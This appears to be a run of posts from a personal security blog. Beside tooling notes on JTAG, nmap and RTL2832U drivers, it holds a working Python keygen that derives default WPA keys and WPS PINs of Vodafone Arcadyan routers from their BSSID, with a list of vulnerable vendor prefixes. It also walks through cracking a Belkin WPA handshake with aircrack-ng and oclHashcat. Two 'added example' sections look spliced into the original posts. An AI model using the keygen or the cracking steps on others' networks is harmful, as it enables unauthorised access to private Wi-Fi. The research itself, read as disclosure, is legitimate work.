detect        detect parts on the JTAG chain
signal        define new signal for a part
scan          read BSR and show changes since last scan
salias        define an alias for a signal
bit           define new BSR bit
register      define new data register for a part
initbus       initialize bus driver for active part
print         display JTAG chain list/status
part          change active part for current JTAG chain
bus           change active bus
instruction   change active instruction for a part or declare new instruction
shift         shift data/instruction registers through JTAG chain
dr            display active data register for a part
get           get external signal value
test          test external signal value
shell         shell cmmd
set           set external signal value
endian        set/print endianess
peek          read a single word
poke          write a single word
pod           Set state of POD signal(s)
readmem       read content of the memory and write it to file
writemem      write content of file to the memory
detectflash   detect parameters of flash chips attached to a part
flashmem      burn flash memory with data from a file
eraseflash    erase flash memory by number of blocks
script        run command sequence from external file
include       include command sequence from external repository
addpart       manually adds parts on the JTAG chain
usleep        Sleep some number of microseconds
svf           execute svf commands from file
bsdl          manage BSDL files
debug         debug jtag program

Type "help COMMAND" for details about a particular command.

Option 3 (from Ubuntu repositories)

If you are lazy or just want to try something quickly without compiling, you can take this option.

$ apt-cache search jtag
avarice - use GDB with Atmel's JTAG ICE for the AVR
flashrom - Identify, read, write, erase, and verify BIOS/ROM/flash chips
flexloader - utility to configure SRAM based ALTERA devices
libusbprog-dev - Development files for libusbprog
libusbprog0 - Library for programming the USBprog hardware
mspdebug - debugging tool for MSP430 microcontrollers
openocd - Open on-chip JTAG debug solution for ARM and MIPS systems
openwince-jtag - allows programming jtag capable devices such as CPUs or FPGAs
urjtag - JTAG programmer for various flash parts and boards
usbprog - Firmware programming tool for the USBprog hardware
usbprog-gui - GUI firmware programming tool for the USBprog hardware

$ sudo apt-get install -y urjtag


[1] http://huaweihg612hacking.wordpress.com/2012/11/07/jtaging-the-broadcom-bcm6368-hg612/
[2] http://www.altera.com/download/drivers/dri-usb_b-lnx.html
[3] http://www.eecg.toronto.edu/~laforest/USB-Blaster-Debian.html
[4] http://openocd.sourceforge.net/doc/pdf/openocd.pdf
[5] http://sourceforge.net/p/urjtag/svn/HEAD/tree/trunk/
[6] https://forum.openwrt.org/viewtopic.php?id=4191
[7] http://openocd.sourceforge.net/doc/html/Debug-Adapter-Hardware.html#Debug-Adapter-Hardware


Arcadyan routers used by Vodafone in Spain are also vulnerable

Tuesday, 4 February 2014 1 comment


Around 2011 some routers manufactured by Arcadyan were reverse engineered by the staff of seguridadwireless.net. The research started with a user called MrFoffly, or something like that, who obtained an interesting log from a Ya.com update: he took a firmware image, XORed it with 0xFF in raw mode and obtained the following strings. Many more routers could be affected by the same vulnerability in the future if this company keeps using the same public, patented algorithms.


##!![E-BOOTPARAM-WRITE] User settings are not stored!!
###[BUILD-WEP] (Z1 Z2 Z3): %1X%1X%1X
##[BUILD-WEP] (x[1] XOR z[2])=(%1X XOR %1X)=%1X
##[BUILD-WEP] (y[2] XOR y[3]) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (x[3]  XOR y[1]) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (x[2]  XOR z[3]) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (w[0] w[1] w[2] w[3]): %1X%1X%1X%1X
####%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X#[BUILD-WEP]: Key:%s
####[BUILD-WEP] K1,2:[%1X,%1X]
#[BUILD-WEP] (K1 XOR S10)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K1 XOR S9) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (K1 XOR S8) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (X1 X2 X3): %1X%1X%1X
##[BUILD-WEP] (K2 XOR M10)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K2 XOR M11)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K2 XOR M12)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (Y1 Y2 Y3): %1X%1X%1X
##[BUILD-WEP] (M11 XOR S10)=(%1X XOR %1X)=%1X
####Boot Parameters NOT found !!!
##Bootcode version: %s
###Serial number: %s
##Hardware version: %s
##WLAN%c%c%c%c%c%c####[BUILD-WEP] S6,7,8,9,10:[%1X,%1X,%1X,%1X,%1X]
##[BUILD-WEP] M7,8,9,10,11,12:[%1X,%1X,%1X,%1X,%1X,%1X]
##!!! Invalid wireless channel range %d ~ %d
#!!! Use default value %d ~ %d
##default route: %d.%d.%d.%d
#ifno:%d  enableOS:%d enableWEP:%d enableSSN:%d
#!!No configuration file present!!
##!!Cleanup configuration in flash memory!!
##%s> flash version:[%s], [%d.%d.%d]
#etcpip_init_config##Jan 18 2008#16:39:45####Set flash memory layout to #BRN-BOOT####Boot Parameters found !!!
##01234567####[BUILD-WEP] (M12 XOR S9) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (K1  XOR K2) =(%1X XOR %1X)=%1X
####!![E-CFG-VER] Reconfiguration required!!


After that some of us were a bit stuck, but another user, Mambostar, managed to figure out the algorithm and generate 10 possible keys using the logs as well as the patents (see references). Two years later some German researchers reverse engineered some Easybox routers and found the same problems; using this algorithm, or the patents as well, many routers were exposed all over Germany. Roughly one year later, in 2013-2014, this algorithm unfortunately came back to hit some Spanish routers deployed by Vodafone, namely the model ARV752DPW. However, really not many of Vodafone's routers have been affected by this vulnerability.



Here is a proof-of-concept of this vulnerability that I coded because of a small difference in the algorithm. Plenty of code has been reused from previous scripts; please take a look at the credits in the code. So far the only difference observed has been the replacement of zeros by ones at the end of the key generation algorithm, and some very weird details such as the use of non-hexadecimal characters in the ESSID: any zero in the fifth or sixth byte of the BSSID is automatically transformed into a G in the ESSID.

import sys

def algorithm(mac):
    '''Sebastian Petters. Changes: Added exceptions and leave out some variables pointless'''
    try:
        bytes = [int(x, 16) for x in mac.split(':')]
        # c1 is the last two bytes of the MAC as a 16-bit integer; its 5 decimal
        # digits become s6..s10 and the last 4 hex nibbles of the MAC become m9..m12
        c1 = (bytes[-2] << 8) + bytes[-1]
        (s6, s7, s8, s9, s10) = [int(x) for x in '%05d' % (c1)]
        (m9, m10, m11, m12)   = [int(x, 16) for x in mac.replace(':', '')[8:]]
    except (ValueError, IndexError):
        sys.stderr.write("[!] Check your bssid!  Format XX:XX:XX:XX:XX:XX\n")
        return None

    k1 = ( s7 + s8  + m11 + m12) & (0x0F)
    k2 = ( m9 + m10 + s9  + s10) & (0x0F)
    x1 = k1  ^ s10
    x2 = k1  ^ s9
    x3 = k1  ^ s8
    y1 = k2  ^ m10
    y2 = k2  ^ m11
    y3 = k2  ^ m12
    z1 = m11 ^ s10
    z2 = m12 ^ s9
    z3 = k1  ^ k2

    # the nine nibbles are printed as upper-case hex digits
    wpa = "%X%X%X%X%X%X%X%X%X" % (x1, y1, z1, x2, y2, z2, x3, y3, z3)

    # Spanish modification in this algorithm: every zero becomes a one
    if wpa.find("0") != -1:
        wpa = wpa.replace("0","1")

    return wpa


Any suggestions or feedback are always very much appreciated, as are bug reports or enhancements to the code.


$ python vodafoneArcadyanSpain.py -h
usage: vodafoneArcadyanSpain.py [-h] [-b [BSSID]] [-v] [-l]

>>> PoC keygen for WiFi Networks deployed by Vodafone Arcadyan in Spain. So
far only WiFi networks with well-known bssids and essid like VodafoneXXXX are
likely vulnerable. See http://ednolo.alumnos.upv.es/ for more details.
Twitter: @enovella_ and email: ednolo[at]inf.upv.es

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -l, --list            List all vulnerable mac address (essid VodafoneXXXX)

  -b [BSSID], --bssid [BSSID]
                        Target mac address

(+) Help: Send me bugs or new targets. Credits buckynet as usual 

$ python vodafoneArcadyanSpain.py -l
[+] Possible vulnerable targets:
	 bssid: 74:31:70:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 84:9C:A6:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 88:03:55:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 1C:C6:3C:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 50:7E:5D:xx:xx:xx 	 essid: VodafoneXXXX
	 bssid: 00:12:BF:xx:xx:xx 	 essid: VodafoneXXXX

$ python vodafoneArcadyanSpain.py -b 74:31:70:33:00:11
[+] SSID       : VodafoneGG11
[+] BSSID      : 74:31:70:33:00:11
[+] WPA KEY    : 58639129A
[+] WPS PIN    : 75944988
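As an added example (not part of the original post nor of the PoC script), here is a small audit helper for checking whether a router of your own still broadcasts its factory SSID, which is the sign that the default key was probably never changed. It assumes the factory ESSID is always "Vodafone" followed by the last two BSSID bytes in upper-case hex with the zero-to-G substitution described above (the upper-case part is an assumption), and it uses the vendor prefixes that the -l option prints. The scan listing is constructed; only its first line comes from the run shown above.

```python
import re

# Vendor prefixes (OUIs) that the PoC's -l option prints above.
AFFECTED_OUIS = {"74:31:70", "84:9C:A6", "88:03:55", "1C:C6:3C", "50:7E:5D", "00:12:BF"}

MAC_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")

def expected_default_essid(bssid):
    """Factory ESSID derived from the BSSID: 'Vodafone' followed by the last two
    BSSID bytes, where every '0' is replaced by 'G' as the post describes.
    Assumption: hex letters in those bytes appear upper-case in the ESSID."""
    if not MAC_RE.match(bssid):
        raise ValueError("BSSID must look like XX:XX:XX:XX:XX:XX")
    tail = bssid.replace(":", "").upper()[8:]
    return "Vodafone" + tail.replace("0", "G")

def audit_network(bssid, essid):
    """Classify one network:
       'default-ssid' - affected vendor prefix and the ESSID is exactly the factory
                        one, so the default WPA key is most likely still in use
       'renamed'      - affected vendor prefix but the owner changed the ESSID
       'not-affected' - vendor prefix outside the list"""
    if bssid.upper()[:8] not in AFFECTED_OUIS:
        return "not-affected"
    if essid == expected_default_essid(bssid):
        return "default-ssid"
    return "renamed"

# Constructed scan output (made-up networks), one "BSSID ESSID" pair per line;
# the first line is the example from the PoC run above.
SAMPLE_SCAN = """\
74:31:70:33:00:11 VodafoneGG11
74:31:70:AA:0B:C0 VodafoneGBCG
84:9C:A6:12:34:56 Vodafone3456
88:03:55:00:01:02 MiRedPrivada
00:11:22:33:44:55 Vodafone4455
"""

def audit_scan(text):
    """Map each BSSID in a scan listing to its audit verdict."""
    verdicts = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        bssid, essid = line.split(None, 1)
        verdicts[bssid] = audit_network(bssid, essid.strip())
    return verdicts

if __name__ == "__main__":
    for bssid, verdict in sorted(audit_scan(SAMPLE_SCAN).items()):
        print("%s  %s" % (bssid, verdict))
```

A "default-ssid" verdict on your own network means both the SSID and, almost certainly, the passphrase should be changed; a "renamed" network only tells you the owner touched the configuration, not that the key was replaced.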


[+] UPDATE Android 2014-02-15

The new version of wlan4xx includes this algorithm. You can find it for Android devices at http://wlan4xx.blogspot.com/



[+] References:

http://foro.seguridadwireless.net/desarrollo-112/wlan4xx-algoritmo-routers-yacom/ (SPAIN)
http://www.wotan.cc/?p=6
http://www.wardriving-forum.de/wiki/Standardpassw%C3%B6rter

[+] Patents:




Compiling nmap 6.40 on Ubuntu 12.04.3

Saturday, 14 December 2013 No comments

If you are using nmap from the Ubuntu repositories, you will surely be using an old version lacking many features such as scripts. Therefore, if you want to compile it from source code, just follow these steps:

wget http://nmap.org/dist/nmap-6.40.tar.bz2
tar -jxvf nmap-6.40.tar.bz2
cd nmap-6.40
./configure
make "LUA_LIBS=../liblua/liblua.a -ldl -lm"
sudo checkinstall
sudo dpkg -i nmap_6.40-1_amd64.deb

And now you can enjoy nmap:

            .       .
             } 6 6 {
            ==. Y ,==
              /^^^\  .
             /     \  )  Ncat: A modern interpretation of classic Netcat
            (  )-(  )/
            -""---""---   /
           /   Ncat    \_/
          (     ____
Configuration complete.
   (  )   /\   _                 (
    \ |  (  \ ( \.(               )                      _____
  \  \ \  `  `   ) \             (  ___                 / _   \
 (_`    \+   . x  ( .\            \/   \____-----------/ (o)   \_
- .-               \+  ;          (  O                           \____
(__                +- .( -'.- <.   \_____________  `              \  /
(_____            ._._: <_ - <- _- _  VVVVVVV VV V\                \/
  .    /./.+-  . .- /  +--  - .    (--_AAAAAAA__A_/                |
  (__ ' /x  / x _/ (                \______________//_              \_______
 , x / ( '  . / .  /                                  \___'          \     /
    /  /  _/ /    +                                       |           \   /
   '  (__/                                               /              \/
                                                       /                  \
Configuration complete.  Type make (or gmake on some *BSD machines) to compile.

$ nmap
Nmap 6.40 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
  Can pass hostnames, IP addresses, networks, etc.
  Ex: scanme.nmap.org, microsoft.com/24,; 10.0.0-255.1-254
  -iL <inputfilename>: Input from list of hosts/networks
  -iR <num hosts>: Choose random targets
  --exclude <host1[,host2][,host3],...>: Exclude hosts/networks
  --excludefile <exclude_file>: Exclude list from file
  -sL: List Scan - simply list targets to scan
  -sn: Ping Scan - disable port scan
  -Pn: Treat all hosts as online -- skip host discovery
  -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
  -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
  -PO[protocol list]: IP Protocol Ping
  -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
  --dns-servers <serv1[,serv2],...>: Specify custom DNS servers
  --system-dns: Use OS's DNS resolver
  --traceroute: Trace hop path to each host
  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  -sU: UDP Scan
  -sN/sF/sX: TCP Null, FIN, and Xmas scans
  --scanflags <flags>: Customize TCP scan flags
  -sI <zombie host[:probeport]>: Idle scan
  -sO: IP protocol scan
  -b <FTP relay host>: FTP bounce scan
  -p <port ranges>: Only scan specified ports
    Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
  -F: Fast mode - Scan fewer ports than the default scan
  -r: Scan ports consecutively - don't randomize
  --top-ports <number>: Scan <number> most common ports
  --port-ratio <ratio>: Scan ports more common than <ratio>
  -sV: Probe open ports to determine service/version info
  --version-intensity <level>: Set from 0 (light) to 9 (try all probes)
  --version-light: Limit to most likely probes (intensity 2)
  --version-all: Try every single probe (intensity 9)
  --version-trace: Show detailed version scan activity (for debugging)
  -sC: equivalent to --script=default
  --script=<Lua scripts>: <Lua scripts> is a comma separated list of 
           directories, script-files or script-categories
  --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts
  --script-args-file=filename: provide NSE script args in a file
  --script-trace: Show all data sent and received
  --script-updatedb: Update the script database.
  --script-help=<Lua scripts>: Show help about scripts.
           <Lua scripts> is a comma separted list of script-files or
  -O: Enable OS detection
  --osscan-limit: Limit OS detection to promising targets
  --osscan-guess: Guess OS more aggressively
  Options which take <time> are in seconds, or append 'ms' (milliseconds),
  's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
  -T<0-5>: Set timing template (higher is faster)
  --min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes
  --min-parallelism/max-parallelism <numprobes>: Probe parallelization
  --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies
      probe round trip time.
  --max-retries <tries>: Caps number of port scan probe retransmissions.
  --host-timeout <time>: Give up on target after this long
  --scan-delay/--max-scan-delay <time>: Adjust delay between probes
  --min-rate <number>: Send packets no slower than <number> per second
  --max-rate <number>: Send packets no faster than <number> per second
  -f; --mtu <val>: fragment packets (optionally w/given MTU)
  -D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys
  -S <IP_Address>: Spoof source address
  -e <iface>: Use specified interface
  -g/--source-port <portnum>: Use given port number
  --data-length <num>: Append random data to sent packets
  --ip-options <options>: Send packets with specified ip options
  --ttl <val>: Set IP time-to-live field
  --spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address
  --badsum: Send packets with a bogus TCP/UDP/SCTP checksum
  -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3,
     and Grepable format, respectively, to the given filename.
  -oA <basename>: Output in the three major formats at once
  -v: Increase verbosity level (use -vv or more for greater effect)
  -d: Increase debugging level (use -dd or more for greater effect)
  --reason: Display the reason a port is in a particular state
  --open: Only show open (or possibly open) ports
  --packet-trace: Show all packets sent and received
  --iflist: Print host interfaces and routes (for debugging)
  --log-errors: Log errors/warnings to the normal-format output file
  --append-output: Append to rather than clobber specified output files
  --resume <filename>: Resume an aborted scan
  --stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML
  --webxml: Reference stylesheet from Nmap.Org for more portable XML
  --no-stylesheet: Prevent associating of XSL stylesheet w/XML output
  -6: Enable IPv6 scanning
  -A: Enable OS detection, version detection, script scanning, and traceroute
  --datadir <dirname>: Specify custom Nmap data file location
  --send-eth/--send-ip: Send using raw ethernet frames or IP packets
  --privileged: Assume that the user is fully privileged
  --unprivileged: Assume the user lacks raw socket privileges
  -V: Print version number
  -h: Print this help summary page.
  nmap -v -A scanme.nmap.org
  nmap -v -sn
  nmap -v -iR 10000 -Pn -p 80
SEE THE MAN PAGE (http://nmap.org/book/man.html) FOR MORE OPTIONS AND EXAMPLES

RTL2832U in Ubuntu 12.04.3 with kernel 3.8.0

Saturday, 7 December 2013 4 comments

It has been a long time since I could write in my humble blog, and this time it will be quick too, just to remember how to install the RTL2832U drivers on Linux. I was interested in playing with SDR and Osmocon, so I ordered the cheapest Chinese DVB USB stick, for around $8, to play with. If we take a look at the Osmocom website, we can see that this device is able to work properly.


How to install our RTL2832U on Ubuntu 12.04.3 LTS with kernel 3.8.0:


First of all, let's plug our DVB USB stick into our box and check the manufacturer with:

$ lsusb  
Bus 003 Device 009: ID 0bda:2838 Realtek Semiconductor Corp.



Well, let's see whether our OS was able to load the modules. Apparently not :(

$ dmesg
[25415.111665] usb 3-2: new high-speed USB device number 4 using xhci_hcd
[25415.142742] usb 3-2: New USB device found, idVendor=0bda, idProduct=2838
[25415.142748] usb 3-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[25415.142751] usb 3-2: Product: RTL2838UHIDIR
[25415.142754] usb 3-2: Manufacturer: Realtek
[25415.142757] usb 3-2: SerialNumber: 00000001
[25415.234923] usbcore: registered new interface driver dvb_usb_rtl28xxu
[25415.235054] usb 3-2: dvb_usb_v2: found a 'Realtek RTL2832U reference design' in warm state
[25415.303306] usb 3-2: dvb_usb_v2: will pass the complete MPEG2 transport stream to the software demuxer
[25415.303322] DVB: registering new adapter (Realtek RTL2832U reference design)
[25415.303637] usb 3-2: dvb_usb_rtl28xxu: unknown tuner=NONE
[25415.316812] usb 3-2: dvb_usb_v2: 'Realtek RTL2832U reference design' error while loading driver (-19)
[25415.317674] usb 3-2: dvb_usb_v2: 'Realtek RTL2832U reference design' successfully deinitialized and disconnected



For reference, it's an unbranded Chinese one with an RTL2832 and an E4000 tuner. Here are the right steps to watch TV on your box (look at the references for the 3.8.0 patch or, if you trust my website, here you go!):

sudo apt-get install linux-headers-`uname -r`
sudo apt-get install libproc-processtable-perl
mkdir dvb-2832u
cd dvb-2832u
git clone git://linuxtv.org/media_build.git
cd media_build
cd linux/
# the 3.8.0 patch downloaded from the link in the references, saved one directory up
patch -p1 < ../dvb-usb-rtl2832.patch
cd ..
make allmodconfig
sudo make install




And now we can enjoy our DvB receiver:

$ dmesg
[  150.901226] usb 3-2: dvb_usb_v2: 'Realtek RTL2832U reference design' successfully deinitialized and disconnected
[  154.491864] usb 3-2: new high-speed USB device number 4 using xhci_hcd
[  154.522748] usb 3-2: New USB device found, idVendor=0bda, idProduct=2838
[  154.522753] usb 3-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[  154.522756] usb 3-2: Product: RTL2838UHIDIR
[  154.522759] usb 3-2: Manufacturer: Realtek
[  154.522761] usb 3-2: SerialNumber: 00000001
[  154.528776] usb 3-2: dvb_usb_v2: found a 'Realtek RTL2832U reference design' in warm state
[  154.598304] usb 3-2: dvb_usb_v2: will pass the complete MPEG2 transport stream to the software demuxer
[  154.598319] DVB: registering new adapter (Realtek RTL2832U reference design)
[  154.601430] usb 3-2: DVB: registering adapter 0 frontend 0 (Realtek RTL2832 (DVB-T))...
[  154.601493] r820t 0-001a: creating new instance
[  154.614036] r820t 0-001a: Rafael Micro r820t successfully identified
[  154.621529] Registered IR keymap rc-empty
[  154.621628] input: Realtek RTL2832U reference design as /devices/pci0000:00/0000:00:1c.1/0000:03:00.0/usb3/3-2/rc/rc1/input19
[  154.621712] rc1: Realtek RTL2832U reference design as /devices/pci0000:00/0000:00:1c.1/0000:03:00.0/usb3/3-2/rc/rc1
[  154.621865] input: MCE IR Keyboard/Mouse (dvb_usb_rtl28xxu) as /devices/virtual/input/input20
[  154.621935] rc rc1: lirc_dev: driver ir-lirc-codec (dvb_usb_rtl28xxu) registered at minor = 0
[  154.621937] usb 3-2: dvb_usb_v2: schedule remote query interval to 400 msecs
[  154.635023] usb 3-2: dvb_usb_v2: 'Realtek RTL2832U reference design' successfully initialized and connected




Patch: http://forum.stmlabs.com/showthread.php?pid=46468



CrackWPA I : Breaking Belkin WPA passphrases by bruteforce (oclHashcat)

Monday, 29 July 2013 No comments


UPDATED! Due to the release of the new algorithm this method is pointless. Take a look at my P0C: https://bitbucket.org/dudux/belkin4xx.

Some months ago I wrote about default WPS PINs (CVE-2012-6371) in some Belkin routers, after reading another interesting post on how to bruteforce a WiFi network with ESSIDs like belkin.XXXX (CVE-2012-4366). The researchers affirmed that they had found out how to generate the default WPA keys from the MAC address using substitution tables. Surely, if you have enough data, you can figure it out; otherwise it would be pretty interesting to look for it in the firmwares. Anyway, in this post I am going to crack an EAPOL+WPA handshake using oclHashcat-plus and maskprocessor.

While I am trying to figure out how to generate those passphrases, we can demonstrate how weak they are if we use two GPUs such as the HD 7970.

If you are attempting this at home, you'll need the following:

  • As many GPUs as you can get (at least one is enough)
  • oclHashcat-plus correctly installed on your machine
  • The aircrack-ng suite
  • Maskprocessor (also from the Hashcat team)
  • A valid handshake from any Belkin WiFi network

First of all, we have to obtain a valid handshake in CAP format. The best way is using aircrack-ng, although you can also try it online using this link: https://hashcat.net/cap2hccap/. Once we have the handshake, if we want to use oclHashcat we have to convert it from .cap to .hccap (a special capture format for working with hashcat; please take a look below for further information).

$ aircrack-ng  9944XXYY35A1_belkin-43a2.cap -J belkin
Opening 9944XXYY35A1_belkin-43a2.cap
Read 12517 packets.

   #  BSSID              ESSID                     Encryption

   1  94:44:XX:YY:35:A1  belkin.43a2               EAPOL+WPA (1 handshake)

Choosing first network as target.

Opening 9944XXYY35A1_belkin-43a2.cap
Reading packets, please wait...

Building Hashcat (1.00) file...

[*] ESSID (length: 11): belkin.43a2
[*] Key version: 2
[*] BSSID: 94:44:XX:YY:35:A1
[*] STA: ZZ:WW:71:3D:B9:7A
[*] anonce:
    4A 9B 2F C4 33 6C 35 33 76 83 50 6C F7 17 57 20 
    B4 0C 7A F7 26 E9 5D 6D F2 97 AA 75 3E AE 7F A9 
[*] snonce:
    05 4F 52 A0 18 78 7C E0 07 E8 89 7E ED 99 A1 97 
    1B F8 30 34 3A 4F 14 EC F0 2D D7 72 4D 3A E1 56 
[*] Key MIC:
    6C 33 F8 97 EA 50 E1 DB 16 5B C9 EC 95 7A 99 C7
[*] eapol:
    01 03 00 75 02 01 0A 00 00 00 00 00 00 00 00 00 
    00 05 4F 52 A0 18 78 7C E0 07 E8 89 7E ED 99 A1 
    97 1B F8 30 34 3A 4F 14 EC F0 2D D7 72 4D 3A E1 
    56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 16 30 14 01 00 00 0F AC 04 01 00 00 0F AC 
    04 01 00 00 0F AC 02 00 00 

Successfully written to belkin.hccap

Quitting aircrack-ng...


hccap specs: structure of the WPA (.hccap) files used by hashcat

Secondly, there are several ways to use oclHashcat to try to crack these networks:

  1. Pipe maskprocessor output into stdin (advantage: on the fly, no space on the HDD is required; disadvantage: we cannot watch time, temperature and so on)
  2. Dictionary attack, creating the wordlist with maskprocessor beforehand (advantage: we can watch temperature, time and so on; disadvantage: some GB of your HDD)
  3. Bruteforce with -a 3 (advantage: on the fly, no hard disk, no pipes) (thanks philsmd of Hashcat's IRC for that notation)

I chose the second one because I like watching the status and, most importantly, I can pause the process when I need to. Anyway, the speed is exactly the same.

After installing maskprocessor we can get the exact number of combinations if we know the mask of the attack. We know that Belkin is using WPA passphrases of length 8 with the charset of lowercase hexadecimal digits (0-9, a-f). Now we can quickly calculate the possible combinations:

$ ./mp64.bin --custom-charset1=?dabcdef ?1?1?1?1?1?1?1?1 --combinations

To save the wordlist we simply redirect the output in a file:

$ time ./mp64.bin --custom-charset1=?dabcdef ?1?1?1?1?1?1?1?1 > ../../../wordlist/WPA/belkin.txt

real    14m15.701s
user    1m25.245s
sys      1m9.252s

$ ls -lah belkin.txt

-rwxrwxrwx 1 root root 36G Jul 29 00:20 belkin.txt
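To put numbers on how weak this passphrase policy is, here is an added example (my own code, not part of the original post nor a Hashcat tool) that parses a hashcat-style mask with custom charsets and computes the keyspace, the size of the wordlist on disk and the worst-case time to exhaust it at a given rate. For the Belkin mask it reproduces the 4294967296 candidates and the 38654705664 bytes that oclHashcat reports further down; the 236000 candidates per second rate is taken from the status output below, and the built-in charsets follow hashcat's definitions.

```python
# Built-in charsets as hashcat/maskprocessor define them.
BUILTIN = {
    "l": "abcdefghijklmnopqrstuvwxyz",
    "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "d": "0123456789",
    "h": "0123456789abcdef",
    "H": "0123456789ABCDEF",
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]  # 95 printable ASCII

def _tokens(spec, custom):
    """Yield one charset string per position of a mask (or per element of a
    charset spec). '?x' is a built-in charset or a custom one ('?1'..'?4'),
    '??' is a literal '?', anything else is a literal character."""
    i = 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            if key in custom:
                yield custom[key]
            elif key in BUILTIN:
                yield BUILTIN[key]
            elif key == "?":
                yield "?"
            else:
                raise ValueError("unknown charset ?%s" % key)
            i += 2
        else:
            yield spec[i]
            i += 1

def expand_charset(spec, custom=None):
    """'--custom-charset1=?dabcdef' -> the 16 lowercase hex digits."""
    chars = set()
    for tok in _tokens(spec, custom or {}):
        chars.update(tok)
    return "".join(sorted(chars))

def parse_mask(mask, custom=None):
    return list(_tokens(mask, custom or {}))

def keyspace(mask, custom=None):
    """Number of candidate passphrases the mask describes."""
    n = 1
    for cs in parse_mask(mask, custom):
        n *= len(cs)
    return n

def wordlist_bytes(mask, custom=None):
    """Size on disk if every candidate is written on its own line (plus newline)."""
    return keyspace(mask, custom) * (len(parse_mask(mask, custom)) + 1)

def seconds_to_exhaust(mask, rate, custom=None):
    """Worst-case time at 'rate' candidates per second; the expected time is half."""
    return keyspace(mask, custom) / float(rate)

if __name__ == "__main__":
    belkin = {"1": expand_charset("?dabcdef")}   # the -1 / --custom-charset1 above
    mask = "?1?1?1?1?1?1?1?1"
    rate = 236000                                # two HD 7970 GPUs, per the status output
    print("keyspace      : %d" % keyspace(mask, belkin))
    print("wordlist size : %d bytes" % wordlist_bytes(mask, belkin))
    print("worst case    : %.1f hours" % (seconds_to_exhaust(mask, rate, belkin) / 3600))
    strong = "?a" * 12                           # 12 printable ASCII characters, for comparison
    print("12 x ?a       : %.1e years" % (seconds_to_exhaust(strong, rate) / (3600 * 24 * 365)))
```

The comparison line is the point for the defender: the same two GPUs that exhaust eight hex digits in about five hours would need on the order of hundreds of millions of years for a random 12-character printable passphrase, which is why the advice at the end of the post is to replace the default key rather than rely on the vendor's scheme.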

In order to crack the handshake using our wordlist and oclHashcat, we can use the following command:


 $ ./oclHashcat-plus64.bin -m 2500 --gpu-loops=1024  /tocrack/belkin.hccap /wordlist/WPA/belkin.txt 

Generating dictionary stats for /wordlist/WPA/belkin.txt: 1399569552 bytes (3.62%), 155507728 words, 15550772
Generating dictionary stats for /wordlist/WPA/belkin.txt: 1910789568 bytes (4.94%), 212309952 words, 21230995
Generating dictionary stats for /wordlist/WPA/belkin.txt: 2012405022 bytes (5.21%), 223600558 words, 22360055
Generating dictionary stats for /wordlist/WPA/belkin.txt: 2114020476 bytes (5.47%), 234891164 words, 23489116
Generating dictionary stats for /wordlist/WPA/belkin.txt: 2216683512 bytes (5.73%), 246298168 words, 24629816
Generated dictionary stats for /wordlist/WPA/belkin.txt: 38654705664 bytes, 4294967296 words, 4294967296 keyspace                    

[s]tatus [p]ause [r]esume [b]ypass [q]uit => s
Session.Name...: oclHashcat-plus
Status.........: Running
Input.Mode.....: File (/wordlist/WPA/belkin.txt)
Hash.Target....: belkin.43a2 (94:44:XX:YY:35:a1 <-> WW:ZZ:71:3d:b9:7a)
Hash.Type......: WPA/WPA2
Time.Started...: Mon Jul 29 05:31:56 2013 (12 secs)
Time.Estimated.: Mon Jul 29 10:48:33 2013 (5 hours, 9 mins)
Speed.GPU.#1...:   116.8k/s
Speed.GPU.#2...:   119.2k/s
Speed.GPU.#*...:   236.0k/s
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.......: 2867200/4294967296 (0.07%)
Rejected.......: 0/2867200 (0.00%)
HWMon.GPU.#1...: 97% Util, 46c Temp, 35% Fan
HWMon.GPU.#2...: 97% Util, 41c Temp, 35% Fan

[s]tatus [p]ause [r]esume [b]ypass [q]uit => 


Session.Name...: oclHashcat-plus
Status.........: Cracked
Input.Mode.....: File (/wordlist/WPA/belkin.txt)
Hash.Target....: belkin.43a2 (94:44:XX:YY:35:a1 <-> WW:ZZ:71:3d:b9:7a)
Hash.Type......: WPA/WPA2
Time.Started...: Mon Jul 29 05:31:56 2013 (1 hour, 59 mins)
